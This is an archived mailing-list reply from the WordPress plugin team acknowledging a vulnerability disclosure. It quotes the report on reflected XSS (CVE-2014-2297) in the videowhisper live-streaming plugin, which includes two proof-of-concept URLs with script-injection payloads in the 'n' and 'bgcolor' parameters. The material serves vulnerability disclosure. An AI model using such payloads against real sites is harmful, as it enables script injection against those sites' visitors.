[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss)



Thank you for reporting this plugin. We're looking into it right now.

If you wish to help us speed up the process, please remember to include a clear and concise description of the issue. In the case of any security exploits, it greatly helps if you can provide us with how you verified this is an exploit (links to the plugin listing on sites like Secuina are perfect).

If you provided a link to your report, DO NOT delete it! We have passed it on directly to the developers of the plugin.

Please note: You may not receive further communication from us on this matter, simply due to the volume of emails we get a day. We do greatly appreciate the report.

> Hi All,
> 
> CVE-2014-2297(WordPress-videowhisper-live-streaming-integration
> 4.29.6-Xss), as follows:
> 
>   
> 
>     [»] Language:           [php ]
> 
> 
> 
>     [»] Version:            [ version4.29.6 ] 
> [»] Team:
> Vty###########################################################################
> 
>  
> 
> ===[ Exploit ]==
>  
> 
>    
> [»] Exploit-1:videowhisper-live-streaming-integration/ls/htmlchat.php File
> before using the variable n is not initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in line 34 of the
> file(Code:<title><?=$n?> Text Chat</title>):
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=</title><script>alert(1)</script>
> [»] Exploit-2:videowhisper-live-streaming-integration/ls/index.php Bgcolor
> file using variables not previously initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in the sixth line of the
> file(Code:<body bgcolor="<?=$bgcolor?>">):
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/index.php?bgcolor=";><script>alert(1)</script>//



-- 
Ipstenu (Mika Epstein)